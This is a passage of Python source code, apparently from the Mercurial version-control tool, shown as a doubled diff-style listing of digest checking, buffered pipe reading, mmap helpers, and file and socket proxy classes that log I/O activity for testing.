263 h.update(data)
263 h.update(data)
264
264
265 def __getitem__(self, key):
265 def __getitem__(self, key):
266 if key not in DIGESTS:
266 if key not in DIGESTS:
267 raise error.Abort(_(b'unknown digest type: %s') % k)
267 raise error.Abort(_(b'unknown digest type: %s') % k)
268 return hex(self._hashes[key].digest())
268 return hex(self._hashes[key].digest())
269
269
270 def __iter__(self):
270 def __iter__(self):
271 return iter(self._hashes)
271 return iter(self._hashes)
272
272
273 @staticmethod
273 @staticmethod
274 def preferred(supported):
274 def preferred(supported):
275 """returns the strongest digest type in both supported and DIGESTS."""
275 """returns the strongest digest type in both supported and DIGESTS."""
276
276
277 for k in DIGESTS_BY_STRENGTH:
277 for k in DIGESTS_BY_STRENGTH:
278 if k in supported:
278 if k in supported:
279 return k
279 return k
280 return None
280 return None
281
281
282
282
283 class digestchecker(object):
283 class digestchecker(object):
284 """file handle wrapper that additionally checks content against a given
284 """file handle wrapper that additionally checks content against a given
285 size and digests.
285 size and digests.
286
286
287 d = digestchecker(fh, size, {'md5': '...'})
287 d = digestchecker(fh, size, {'md5': '...'})
288
288
289 When multiple digests are given, all of them are validated.
289 When multiple digests are given, all of them are validated.
290 """
290 """
291
291
292 def __init__(self, fh, size, digests):
292 def __init__(self, fh, size, digests):
293 self._fh = fh
293 self._fh = fh
294 self._size = size
294 self._size = size
295 self._got = 0
295 self._got = 0
296 self._digests = dict(digests)
296 self._digests = dict(digests)
297 self._digester = digester(self._digests.keys())
297 self._digester = digester(self._digests.keys())
298
298
299 def read(self, length=-1):
299 def read(self, length=-1):
300 content = self._fh.read(length)
300 content = self._fh.read(length)
301 self._digester.update(content)
301 self._digester.update(content)
302 self._got += len(content)
302 self._got += len(content)
303 return content
303 return content
304
304
305 def validate(self):
305 def validate(self):
306 if self._size != self._got:
306 if self._size != self._got:
307 raise error.Abort(
307 raise error.Abort(
308 _(b'size mismatch: expected %d, got %d')
308 _(b'size mismatch: expected %d, got %d')
309 % (self._size, self._got)
309 % (self._size, self._got)
310 )
310 )
311 for k, v in self._digests.items():
311 for k, v in self._digests.items():
312 if v != self._digester[k]:
312 if v != self._digester[k]:
313 # i18n: first parameter is a digest name
313 # i18n: first parameter is a digest name
314 raise error.Abort(
314 raise error.Abort(
315 _(b'%s mismatch: expected %s, got %s')
315 _(b'%s mismatch: expected %s, got %s')
316 % (k, v, self._digester[k])
316 % (k, v, self._digester[k])
317 )
317 )
318
318
319
319
320 try:
320 try:
321 buffer = buffer # pytype: disable=name-error
321 buffer = buffer # pytype: disable=name-error
322 except NameError:
322 except NameError:
323
323
324 def buffer(sliceable, offset=0, length=None):
324 def buffer(sliceable, offset=0, length=None):
325 if length is not None:
325 if length is not None:
326 return memoryview(sliceable)[offset : offset + length]
326 return memoryview(sliceable)[offset : offset + length]
327 return memoryview(sliceable)[offset:]
327 return memoryview(sliceable)[offset:]
328
328
329
329
330 _chunksize = 4096
330 _chunksize = 4096
331
331
332
332
333 class bufferedinputpipe(object):
333 class bufferedinputpipe(object):
334 """a manually buffered input pipe
334 """a manually buffered input pipe
335
335
336 Python will not let us use buffered IO and lazy reading with 'polling' at
336 Python will not let us use buffered IO and lazy reading with 'polling' at
337 the same time. We cannot probe the buffer state and select will not detect
337 the same time. We cannot probe the buffer state and select will not detect
338 that data are ready to read if they are already buffered.
338 that data are ready to read if they are already buffered.
339
339
340 This class let us work around that by implementing its own buffering
340 This class let us work around that by implementing its own buffering
341 (allowing efficient readline) while offering a way to know if the buffer is
341 (allowing efficient readline) while offering a way to know if the buffer is
342 empty from the output (allowing collaboration of the buffer with polling).
342 empty from the output (allowing collaboration of the buffer with polling).
343
343
344 This class lives in the 'util' module because it makes use of the 'os'
344 This class lives in the 'util' module because it makes use of the 'os'
345 module from the python stdlib.
345 module from the python stdlib.
346 """
346 """
347
347
348 def __new__(cls, fh):
348 def __new__(cls, fh):
349 # If we receive a fileobjectproxy, we need to use a variation of this
349 # If we receive a fileobjectproxy, we need to use a variation of this
350 # class that notifies observers about activity.
350 # class that notifies observers about activity.
351 if isinstance(fh, fileobjectproxy):
351 if isinstance(fh, fileobjectproxy):
352 cls = observedbufferedinputpipe
352 cls = observedbufferedinputpipe
353
353
354 return super(bufferedinputpipe, cls).__new__(cls)
354 return super(bufferedinputpipe, cls).__new__(cls)
355
355
356 def __init__(self, input):
356 def __init__(self, input):
357 self._input = input
357 self._input = input
358 self._buffer = []
358 self._buffer = []
359 self._eof = False
359 self._eof = False
360 self._lenbuf = 0
360 self._lenbuf = 0
361
361
362 @property
362 @property
363 def hasbuffer(self):
363 def hasbuffer(self):
364 """True is any data is currently buffered
364 """True is any data is currently buffered
365
365
366 This will be used externally a pre-step for polling IO. If there is
366 This will be used externally a pre-step for polling IO. If there is
367 already data then no polling should be set in place."""
367 already data then no polling should be set in place."""
368 return bool(self._buffer)
368 return bool(self._buffer)
369
369
370 @property
370 @property
371 def closed(self):
371 def closed(self):
372 return self._input.closed
372 return self._input.closed
373
373
374 def fileno(self):
374 def fileno(self):
375 return self._input.fileno()
375 return self._input.fileno()
376
376
377 def close(self):
377 def close(self):
378 return self._input.close()
378 return self._input.close()
379
379
380 def read(self, size):
380 def read(self, size):
381 while (not self._eof) and (self._lenbuf < size):
381 while (not self._eof) and (self._lenbuf < size):
382 self._fillbuffer()
382 self._fillbuffer()
383 return self._frombuffer(size)
383 return self._frombuffer(size)
384
384
385 def unbufferedread(self, size):
385 def unbufferedread(self, size):
386 if not self._eof and self._lenbuf == 0:
386 if not self._eof and self._lenbuf == 0:
387 self._fillbuffer(max(size, _chunksize))
387 self._fillbuffer(max(size, _chunksize))
388 return self._frombuffer(min(self._lenbuf, size))
388 return self._frombuffer(min(self._lenbuf, size))
389
389
390 def readline(self, *args, **kwargs):
390 def readline(self, *args, **kwargs):
391 if len(self._buffer) > 1:
391 if len(self._buffer) > 1:
392 # this should not happen because both read and readline end with a
392 # this should not happen because both read and readline end with a
393 # _frombuffer call that collapse it.
393 # _frombuffer call that collapse it.
394 self._buffer = [b''.join(self._buffer)]
394 self._buffer = [b''.join(self._buffer)]
395 self._lenbuf = len(self._buffer[0])
395 self._lenbuf = len(self._buffer[0])
396 lfi = -1
396 lfi = -1
397 if self._buffer:
397 if self._buffer:
398 lfi = self._buffer[-1].find(b'\n')
398 lfi = self._buffer[-1].find(b'\n')
399 while (not self._eof) and lfi < 0:
399 while (not self._eof) and lfi < 0:
400 self._fillbuffer()
400 self._fillbuffer()
401 if self._buffer:
401 if self._buffer:
402 lfi = self._buffer[-1].find(b'\n')
402 lfi = self._buffer[-1].find(b'\n')
403 size = lfi + 1
403 size = lfi + 1
404 if lfi < 0: # end of file
404 if lfi < 0: # end of file
405 size = self._lenbuf
405 size = self._lenbuf
406 elif len(self._buffer) > 1:
406 elif len(self._buffer) > 1:
407 # we need to take previous chunks into account
407 # we need to take previous chunks into account
408 size += self._lenbuf - len(self._buffer[-1])
408 size += self._lenbuf - len(self._buffer[-1])
409 return self._frombuffer(size)
409 return self._frombuffer(size)
410
410
411 def _frombuffer(self, size):
411 def _frombuffer(self, size):
412 """return at most 'size' data from the buffer
412 """return at most 'size' data from the buffer
413
413
414 The data are removed from the buffer."""
414 The data are removed from the buffer."""
415 if size == 0 or not self._buffer:
415 if size == 0 or not self._buffer:
416 return b''
416 return b''
417 buf = self._buffer[0]
417 buf = self._buffer[0]
418 if len(self._buffer) > 1:
418 if len(self._buffer) > 1:
419 buf = b''.join(self._buffer)
419 buf = b''.join(self._buffer)
420
420
421 data = buf[:size]
421 data = buf[:size]
422 buf = buf[len(data) :]
422 buf = buf[len(data) :]
423 if buf:
423 if buf:
424 self._buffer = [buf]
424 self._buffer = [buf]
425 self._lenbuf = len(buf)
425 self._lenbuf = len(buf)
426 else:
426 else:
427 self._buffer = []
427 self._buffer = []
428 self._lenbuf = 0
428 self._lenbuf = 0
429 return data
429 return data
430
430
431 def _fillbuffer(self, size=_chunksize):
431 def _fillbuffer(self, size=_chunksize):
432 """read data to the buffer"""
432 """read data to the buffer"""
433 data = os.read(self._input.fileno(), size)
433 data = os.read(self._input.fileno(), size)
434 if not data:
434 if not data:
435 self._eof = True
435 self._eof = True
436 else:
436 else:
437 self._lenbuf += len(data)
437 self._lenbuf += len(data)
438 self._buffer.append(data)
438 self._buffer.append(data)
439
439
440 return data
440 return data
441
441
442
442
443 def mmapread(fp, size=None):
443 def mmapread(fp, size=None):
444 if size == 0:
444 if size == 0:
445 # size of 0 to mmap.mmap() means "all data"
445 # size of 0 to mmap.mmap() means "all data"
446 # rather than "zero bytes", so special case that.
446 # rather than "zero bytes", so special case that.
447 return b''
447 return b''
448 elif size is None:
448 elif size is None:
449 size = 0
449 size = 0
450 try:
450 try:
451 fd = getattr(fp, 'fileno', lambda: fp)()
451 fd = getattr(fp, 'fileno', lambda: fp)()
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
452 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
453 except ValueError:
453 except ValueError:
454 # Empty files cannot be mmapped, but mmapread should still work. Check
454 # Empty files cannot be mmapped, but mmapread should still work. Check
455 # if the file is empty, and if so, return an empty buffer.
455 # if the file is empty, and if so, return an empty buffer.
456 if os.fstat(fd).st_size == 0:
456 if os.fstat(fd).st_size == 0:
457 return b''
457 return b''
458 raise
458 raise
459
459
460
460
461 class fileobjectproxy(object):
461 class fileobjectproxy(object):
462 """A proxy around file objects that tells a watcher when events occur.
462 """A proxy around file objects that tells a watcher when events occur.
463
463
464 This type is intended to only be used for testing purposes. Think hard
464 This type is intended to only be used for testing purposes. Think hard
465 before using it in important code.
465 before using it in important code.
466 """
466 """
467
467
468 __slots__ = (
468 __slots__ = (
469 '_orig',
469 '_orig',
470 '_observer',
470 '_observer',
471 )
471 )
472
472
473 def __init__(self, fh, observer):
473 def __init__(self, fh, observer):
474 object.__setattr__(self, '_orig', fh)
474 object.__setattr__(self, '_orig', fh)
475 object.__setattr__(self, '_observer', observer)
475 object.__setattr__(self, '_observer', observer)
476
476
477 def __getattribute__(self, name):
477 def __getattribute__(self, name):
478 ours = {
478 ours = {
479 '_observer',
479 '_observer',
480 # IOBase
480 # IOBase
481 'close',
481 'close',
482 # closed if a property
482 # closed if a property
483 'fileno',
483 'fileno',
484 'flush',
484 'flush',
485 'isatty',
485 'isatty',
486 'readable',
486 'readable',
487 'readline',
487 'readline',
488 'readlines',
488 'readlines',
489 'seek',
489 'seek',
490 'seekable',
490 'seekable',
491 'tell',
491 'tell',
492 'truncate',
492 'truncate',
493 'writable',
493 'writable',
494 'writelines',
494 'writelines',
495 # RawIOBase
495 # RawIOBase
496 'read',
496 'read',
497 'readall',
497 'readall',
498 'readinto',
498 'readinto',
499 'write',
499 'write',
500 # BufferedIOBase
500 # BufferedIOBase
501 # raw is a property
501 # raw is a property
502 'detach',
502 'detach',
503 # read defined above
503 # read defined above
504 'read1',
504 'read1',
505 # readinto defined above
505 # readinto defined above
506 # write defined above
506 # write defined above
507 }
507 }
508
508
509 # We only observe some methods.
509 # We only observe some methods.
510 if name in ours:
510 if name in ours:
511 return object.__getattribute__(self, name)
511 return object.__getattribute__(self, name)
512
512
513 return getattr(object.__getattribute__(self, '_orig'), name)
513 return getattr(object.__getattribute__(self, '_orig'), name)
514
514
515 def __nonzero__(self):
515 def __nonzero__(self):
516 return bool(object.__getattribute__(self, '_orig'))
516 return bool(object.__getattribute__(self, '_orig'))
517
517
518 __bool__ = __nonzero__
518 __bool__ = __nonzero__
519
519
520 def __delattr__(self, name):
520 def __delattr__(self, name):
521 return delattr(object.__getattribute__(self, '_orig'), name)
521 return delattr(object.__getattribute__(self, '_orig'), name)
522
522
523 def __setattr__(self, name, value):
523 def __setattr__(self, name, value):
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525
525
526 def __iter__(self):
526 def __iter__(self):
527 return object.__getattribute__(self, '_orig').__iter__()
527 return object.__getattribute__(self, '_orig').__iter__()
528
528
529 def _observedcall(self, name, *args, **kwargs):
529 def _observedcall(self, name, *args, **kwargs):
530 # Call the original object.
530 # Call the original object.
531 orig = object.__getattribute__(self, '_orig')
531 orig = object.__getattribute__(self, '_orig')
532 res = getattr(orig, name)(*args, **kwargs)
532 res = getattr(orig, name)(*args, **kwargs)
533
533
534 # Call a method on the observer of the same name with arguments
534 # Call a method on the observer of the same name with arguments
535 # so it can react, log, etc.
535 # so it can react, log, etc.
536 observer = object.__getattribute__(self, '_observer')
536 observer = object.__getattribute__(self, '_observer')
537 fn = getattr(observer, name, None)
537 fn = getattr(observer, name, None)
538 if fn:
538 if fn:
539 fn(res, *args, **kwargs)
539 fn(res, *args, **kwargs)
540
540
541 return res
541 return res
542
542
543 def close(self, *args, **kwargs):
543 def close(self, *args, **kwargs):
544 return object.__getattribute__(self, '_observedcall')(
544 return object.__getattribute__(self, '_observedcall')(
545 'close', *args, **kwargs
545 'close', *args, **kwargs
546 )
546 )
547
547
548 def fileno(self, *args, **kwargs):
548 def fileno(self, *args, **kwargs):
549 return object.__getattribute__(self, '_observedcall')(
549 return object.__getattribute__(self, '_observedcall')(
550 'fileno', *args, **kwargs
550 'fileno', *args, **kwargs
551 )
551 )
552
552
553 def flush(self, *args, **kwargs):
553 def flush(self, *args, **kwargs):
554 return object.__getattribute__(self, '_observedcall')(
554 return object.__getattribute__(self, '_observedcall')(
555 'flush', *args, **kwargs
555 'flush', *args, **kwargs
556 )
556 )
557
557
558 def isatty(self, *args, **kwargs):
558 def isatty(self, *args, **kwargs):
559 return object.__getattribute__(self, '_observedcall')(
559 return object.__getattribute__(self, '_observedcall')(
560 'isatty', *args, **kwargs
560 'isatty', *args, **kwargs
561 )
561 )
562
562
563 def readable(self, *args, **kwargs):
563 def readable(self, *args, **kwargs):
564 return object.__getattribute__(self, '_observedcall')(
564 return object.__getattribute__(self, '_observedcall')(
565 'readable', *args, **kwargs
565 'readable', *args, **kwargs
566 )
566 )
567
567
568 def readline(self, *args, **kwargs):
568 def readline(self, *args, **kwargs):
569 return object.__getattribute__(self, '_observedcall')(
569 return object.__getattribute__(self, '_observedcall')(
570 'readline', *args, **kwargs
570 'readline', *args, **kwargs
571 )
571 )
572
572
573 def readlines(self, *args, **kwargs):
573 def readlines(self, *args, **kwargs):
574 return object.__getattribute__(self, '_observedcall')(
574 return object.__getattribute__(self, '_observedcall')(
575 'readlines', *args, **kwargs
575 'readlines', *args, **kwargs
576 )
576 )
577
577
578 def seek(self, *args, **kwargs):
578 def seek(self, *args, **kwargs):
579 return object.__getattribute__(self, '_observedcall')(
579 return object.__getattribute__(self, '_observedcall')(
580 'seek', *args, **kwargs
580 'seek', *args, **kwargs
581 )
581 )
582
582
583 def seekable(self, *args, **kwargs):
583 def seekable(self, *args, **kwargs):
584 return object.__getattribute__(self, '_observedcall')(
584 return object.__getattribute__(self, '_observedcall')(
585 'seekable', *args, **kwargs
585 'seekable', *args, **kwargs
586 )
586 )
587
587
588 def tell(self, *args, **kwargs):
588 def tell(self, *args, **kwargs):
589 return object.__getattribute__(self, '_observedcall')(
589 return object.__getattribute__(self, '_observedcall')(
590 'tell', *args, **kwargs
590 'tell', *args, **kwargs
591 )
591 )
592
592
593 def truncate(self, *args, **kwargs):
593 def truncate(self, *args, **kwargs):
594 return object.__getattribute__(self, '_observedcall')(
594 return object.__getattribute__(self, '_observedcall')(
595 'truncate', *args, **kwargs
595 'truncate', *args, **kwargs
596 )
596 )
597
597
598 def writable(self, *args, **kwargs):
598 def writable(self, *args, **kwargs):
599 return object.__getattribute__(self, '_observedcall')(
599 return object.__getattribute__(self, '_observedcall')(
600 'writable', *args, **kwargs
600 'writable', *args, **kwargs
601 )
601 )
602
602
603 def writelines(self, *args, **kwargs):
603 def writelines(self, *args, **kwargs):
604 return object.__getattribute__(self, '_observedcall')(
604 return object.__getattribute__(self, '_observedcall')(
605 'writelines', *args, **kwargs
605 'writelines', *args, **kwargs
606 )
606 )
607
607
608 def read(self, *args, **kwargs):
608 def read(self, *args, **kwargs):
609 return object.__getattribute__(self, '_observedcall')(
609 return object.__getattribute__(self, '_observedcall')(
610 'read', *args, **kwargs
610 'read', *args, **kwargs
611 )
611 )
612
612
613 def readall(self, *args, **kwargs):
613 def readall(self, *args, **kwargs):
614 return object.__getattribute__(self, '_observedcall')(
614 return object.__getattribute__(self, '_observedcall')(
615 'readall', *args, **kwargs
615 'readall', *args, **kwargs
616 )
616 )
617
617
618 def readinto(self, *args, **kwargs):
618 def readinto(self, *args, **kwargs):
619 return object.__getattribute__(self, '_observedcall')(
619 return object.__getattribute__(self, '_observedcall')(
620 'readinto', *args, **kwargs
620 'readinto', *args, **kwargs
621 )
621 )
622
622
623 def write(self, *args, **kwargs):
623 def write(self, *args, **kwargs):
624 return object.__getattribute__(self, '_observedcall')(
624 return object.__getattribute__(self, '_observedcall')(
625 'write', *args, **kwargs
625 'write', *args, **kwargs
626 )
626 )
627
627
628 def detach(self, *args, **kwargs):
628 def detach(self, *args, **kwargs):
629 return object.__getattribute__(self, '_observedcall')(
629 return object.__getattribute__(self, '_observedcall')(
630 'detach', *args, **kwargs
630 'detach', *args, **kwargs
631 )
631 )
632
632
633 def read1(self, *args, **kwargs):
633 def read1(self, *args, **kwargs):
634 return object.__getattribute__(self, '_observedcall')(
634 return object.__getattribute__(self, '_observedcall')(
635 'read1', *args, **kwargs
635 'read1', *args, **kwargs
636 )
636 )
637
637
638
638
639 class observedbufferedinputpipe(bufferedinputpipe):
639 class observedbufferedinputpipe(bufferedinputpipe):
640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
640 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
641
641
642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
642 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
643 bypass ``fileobjectproxy``. Because of this, we need to make
643 bypass ``fileobjectproxy``. Because of this, we need to make
644 ``bufferedinputpipe`` aware of these operations.
644 ``bufferedinputpipe`` aware of these operations.
645
645
646 This variation of ``bufferedinputpipe`` can notify observers about
646 This variation of ``bufferedinputpipe`` can notify observers about
647 ``os.read()`` events. It also re-publishes other events, such as
647 ``os.read()`` events. It also re-publishes other events, such as
648 ``read()`` and ``readline()``.
648 ``read()`` and ``readline()``.
649 """
649 """
650
650
651 def _fillbuffer(self):
651 def _fillbuffer(self):
652 res = super(observedbufferedinputpipe, self)._fillbuffer()
652 res = super(observedbufferedinputpipe, self)._fillbuffer()
653
653
654 fn = getattr(self._input._observer, 'osread', None)
654 fn = getattr(self._input._observer, 'osread', None)
655 if fn:
655 if fn:
656 fn(res, _chunksize)
656 fn(res, _chunksize)
657
657
658 return res
658 return res
659
659
660 # We use different observer methods because the operation isn't
660 # We use different observer methods because the operation isn't
661 # performed on the actual file object but on us.
661 # performed on the actual file object but on us.
662 def read(self, size):
662 def read(self, size):
663 res = super(observedbufferedinputpipe, self).read(size)
663 res = super(observedbufferedinputpipe, self).read(size)
664
664
665 fn = getattr(self._input._observer, 'bufferedread', None)
665 fn = getattr(self._input._observer, 'bufferedread', None)
666 if fn:
666 if fn:
667 fn(res, size)
667 fn(res, size)
668
668
669 return res
669 return res
670
670
671 def readline(self, *args, **kwargs):
671 def readline(self, *args, **kwargs):
672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
672 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
673
673
674 fn = getattr(self._input._observer, 'bufferedreadline', None)
674 fn = getattr(self._input._observer, 'bufferedreadline', None)
675 if fn:
675 if fn:
676 fn(res)
676 fn(res)
677
677
678 return res
678 return res
679
679
680
680
681 PROXIED_SOCKET_METHODS = {
681 PROXIED_SOCKET_METHODS = {
682 'makefile',
682 'makefile',
683 'recv',
683 'recv',
684 'recvfrom',
684 'recvfrom',
685 'recvfrom_into',
685 'recvfrom_into',
686 'recv_into',
686 'recv_into',
687 'send',
687 'send',
688 'sendall',
688 'sendall',
689 'sendto',
689 'sendto',
690 'setblocking',
690 'setblocking',
691 'settimeout',
691 'settimeout',
692 'gettimeout',
692 'gettimeout',
693 'setsockopt',
693 'setsockopt',
694 }
694 }
695
695
696
696
697 class socketproxy(object):
697 class socketproxy(object):
698 """A proxy around a socket that tells a watcher when events occur.
698 """A proxy around a socket that tells a watcher when events occur.
699
699
700 This is like ``fileobjectproxy`` except for sockets.
700 This is like ``fileobjectproxy`` except for sockets.
701
701
702 This type is intended to only be used for testing purposes. Think hard
702 This type is intended to only be used for testing purposes. Think hard
703 before using it in important code.
703 before using it in important code.
704 """
704 """
705
705
706 __slots__ = (
706 __slots__ = (
707 '_orig',
707 '_orig',
708 '_observer',
708 '_observer',
709 )
709 )
710
710
711 def __init__(self, sock, observer):
711 def __init__(self, sock, observer):
712 object.__setattr__(self, '_orig', sock)
712 object.__setattr__(self, '_orig', sock)
713 object.__setattr__(self, '_observer', observer)
713 object.__setattr__(self, '_observer', observer)
714
714
715 def __getattribute__(self, name):
715 def __getattribute__(self, name):
716 if name in PROXIED_SOCKET_METHODS:
716 if name in PROXIED_SOCKET_METHODS:
717 return object.__getattribute__(self, name)
717 return object.__getattribute__(self, name)
718
718
719 return getattr(object.__getattribute__(self, '_orig'), name)
719 return getattr(object.__getattribute__(self, '_orig'), name)
720
720
721 def __delattr__(self, name):
721 def __delattr__(self, name):
722 return delattr(object.__getattribute__(self, '_orig'), name)
722 return delattr(object.__getattribute__(self, '_orig'), name)
723
723
724 def __setattr__(self, name, value):
724 def __setattr__(self, name, value):
725 return setattr(object.__getattribute__(self, '_orig'), name, value)
725 return setattr(object.__getattribute__(self, '_orig'), name, value)
726
726
727 def __nonzero__(self):
727 def __nonzero__(self):
728 return bool(object.__getattribute__(self, '_orig'))
728 return bool(object.__getattribute__(self, '_orig'))
729
729
730 __bool__ = __nonzero__
730 __bool__ = __nonzero__
731
731
732 def _observedcall(self, name, *args, **kwargs):
732 def _observedcall(self, name, *args, **kwargs):
733 # Call the original object.
733 # Call the original object.
734 orig = object.__getattribute__(self, '_orig')
734 orig = object.__getattribute__(self, '_orig')
735 res = getattr(orig, name)(*args, **kwargs)
735 res = getattr(orig, name)(*args, **kwargs)
736
736
737 # Call a method on the observer of the same name with arguments
737 # Call a method on the observer of the same name with arguments
738 # so it can react, log, etc.
738 # so it can react, log, etc.
739 observer = object.__getattribute__(self, '_observer')
739 observer = object.__getattribute__(self, '_observer')
740 fn = getattr(observer, name, None)
740 fn = getattr(observer, name, None)
741 if fn:
741 if fn:
742 fn(res, *args, **kwargs)
742 fn(res, *args, **kwargs)
743
743
744 return res
744 return res
745
745
746 def makefile(self, *args, **kwargs):
746 def makefile(self, *args, **kwargs):
747 res = object.__getattribute__(self, '_observedcall')(
747 res = object.__getattribute__(self, '_observedcall')(
748 'makefile', *args, **kwargs
748 'makefile', *args, **kwargs
749 )
749 )
750
750
751 # The file object may be used for I/O. So we turn it into a
751 # The file object may be used for I/O. So we turn it into a
752 # proxy using our observer.
752 # proxy using our observer.
753 observer = object.__getattribute__(self, '_observer')
753 observer = object.__getattribute__(self, '_observer')
754 return makeloggingfileobject(
754 return makeloggingfileobject(
755 observer.fh,
755 observer.fh,
756 res,
756 res,
757 observer.name,
757 observer.name,
758 reads=observer.reads,
758 reads=observer.reads,
759 writes=observer.writes,
759 writes=observer.writes,
760 logdata=observer.logdata,
760 logdata=observer.logdata,
761 logdataapis=observer.logdataapis,
761 logdataapis=observer.logdataapis,
762 )
762 )
763
763
764 def recv(self, *args, **kwargs):
764 def recv(self, *args, **kwargs):
765 return object.__getattribute__(self, '_observedcall')(
765 return object.__getattribute__(self, '_observedcall')(
766 'recv', *args, **kwargs
766 'recv', *args, **kwargs
767 )
767 )
768
768
769 def recvfrom(self, *args, **kwargs):
769 def recvfrom(self, *args, **kwargs):
770 return object.__getattribute__(self, '_observedcall')(
770 return object.__getattribute__(self, '_observedcall')(
771 'recvfrom', *args, **kwargs
771 'recvfrom', *args, **kwargs
772 )
772 )
773
773
774 def recvfrom_into(self, *args, **kwargs):
774 def recvfrom_into(self, *args, **kwargs):
775 return object.__getattribute__(self, '_observedcall')(
775 return object.__getattribute__(self, '_observedcall')(
776 'recvfrom_into', *args, **kwargs
776 'recvfrom_into', *args, **kwargs
777 )
777 )
778
778
779 def recv_into(self, *args, **kwargs):
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, '_observedcall')(
780 return object.__getattribute__(self, '_observedcall')(
781 'recv_info', *args, **kwargs
781 'recv_info', *args, **kwargs
782 )
782 )
783
783
784 def send(self, *args, **kwargs):
784 def send(self, *args, **kwargs):
785 return object.__getattribute__(self, '_observedcall')(
785 return object.__getattribute__(self, '_observedcall')(
786 'send', *args, **kwargs
786 'send', *args, **kwargs
787 )
787 )
788
788
789 def sendall(self, *args, **kwargs):
789 def sendall(self, *args, **kwargs):
790 return object.__getattribute__(self, '_observedcall')(
790 return object.__getattribute__(self, '_observedcall')(
791 'sendall', *args, **kwargs
791 'sendall', *args, **kwargs
792 )
792 )
793
793
794 def sendto(self, *args, **kwargs):
794 def sendto(self, *args, **kwargs):
795 return object.__getattribute__(self, '_observedcall')(
795 return object.__getattribute__(self, '_observedcall')(
796 'sendto', *args, **kwargs
796 'sendto', *args, **kwargs
797 )
797 )
798
798
799 def setblocking(self, *args, **kwargs):
799 def setblocking(self, *args, **kwargs):
800 return object.__getattribute__(self, '_observedcall')(
800 return object.__getattribute__(self, '_observedcall')(
801 'setblocking', *args, **kwargs
801 'setblocking', *args, **kwargs
802 )
802 )
803
803
804 def settimeout(self, *args, **kwargs):
804 def settimeout(self, *args, **kwargs):
805 return object.__getattribute__(self, '_observedcall')(
805 return object.__getattribute__(self, '_observedcall')(
806 'settimeout', *args, **kwargs
806 'settimeout', *args, **kwargs
807 )
807 )
808
808
809 def gettimeout(self, *args, **kwargs):
809 def gettimeout(self, *args, **kwargs):
810 return object.__getattribute__(self, '_observedcall')(
810 return object.__getattribute__(self, '_observedcall')(
811 'gettimeout', *args, **kwargs
811 'gettimeout', *args, **kwargs
812 )
812 )
813
813
814 def setsockopt(self, *args, **kwargs):
814 def setsockopt(self, *args, **kwargs):
815 return object.__getattribute__(self, '_observedcall')(
815 return object.__getattribute__(self, '_observedcall')(
816 'setsockopt', *args, **kwargs
816 'setsockopt', *args, **kwargs
817 )
817 )
818
818
819
819
820 class baseproxyobserver(object):
820 class baseproxyobserver(object):
821 def __init__(self, fh, name, logdata, logdataapis):
821 def __init__(self, fh, name, logdata, logdataapis):
822 self.fh = fh
822 self.fh = fh
823 self.name = name
823 self.name = name
824 self.logdata = logdata
824 self.logdata = logdata
825 self.logdataapis = logdataapis
825 self.logdataapis = logdataapis
826
826
827 def _writedata(self, data):
827 def _writedata(self, data):
828 if not self.logdata:
828 if not self.logdata:
829 if self.logdataapis:
829 if self.logdataapis:
830 self.fh.write(b'\n')
830 self.fh.write(b'\n')
831 self.fh.flush()
831 self.fh.flush()
832 return
832 return
833
833
834 # Simple case writes all data on a single line.
834 # Simple case writes all data on a single line.
835 if b'\n' not in data:
835 if b'\n' not in data:
836 if self.logdataapis:
836 if self.logdataapis:
837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
837 self.fh.write(b': %s\n' % stringutil.escapestr(data))
838 else:
838 else:
839 self.fh.write(
839 self.fh.write(
840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
840 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
841 )
841 )
842 self.fh.flush()
842 self.fh.flush()
843 return
843 return
844
844
845 # Data with newlines is written to multiple lines.
845 # Data with newlines is written to multiple lines.
846 if self.logdataapis:
846 if self.logdataapis:
847 self.fh.write(b':\n')
847 self.fh.write(b':\n')
848
848
849 lines = data.splitlines(True)
849 lines = data.splitlines(True)
850 for line in lines:
850 for line in lines:
851 self.fh.write(
851 self.fh.write(
852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
852 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
853 )
853 )
854 self.fh.flush()
854 self.fh.flush()
855
855
856
856
857 class fileobjectobserver(baseproxyobserver):
857 class fileobjectobserver(baseproxyobserver):
858 """Logs file object activity."""
858 """Logs file object activity."""
859
859
860 def __init__(
860 def __init__(
861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
861 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
862 ):
862 ):
863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
863 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
864 self.reads = reads
864 self.reads = reads
865 self.writes = writes
865 self.writes = writes
866
866
867 def read(self, res, size=-1):
867 def read(self, res, size=-1):
868 if not self.reads:
868 if not self.reads:
869 return
869 return
870 # Python 3 can return None from reads at EOF instead of empty strings.
870 # Python 3 can return None from reads at EOF instead of empty strings.
871 if res is None:
871 if res is None:
872 res = b''
872 res = b''
873
873
874 if size == -1 and res == b'':
874 if size == -1 and res == b'':
875 # Suppress pointless read(-1) calls that return
875 # Suppress pointless read(-1) calls that return
876 # nothing. These happen _a lot_ on Python 3, and there
876 # nothing. These happen _a lot_ on Python 3, and there
877 # doesn't seem to be a better workaround to have matching
877 # doesn't seem to be a better workaround to have matching
878 # Python 2 and 3 behavior. :(
878 # Python 2 and 3 behavior. :(
879 return
879 return
880
880
881 if self.logdataapis:
881 if self.logdataapis:
882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
882 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
883
883
884 self._writedata(res)
884 self._writedata(res)
885
885
886 def readline(self, res, limit=-1):
886 def readline(self, res, limit=-1):
887 if not self.reads:
887 if not self.reads:
888 return
888 return
889
889
890 if self.logdataapis:
890 if self.logdataapis:
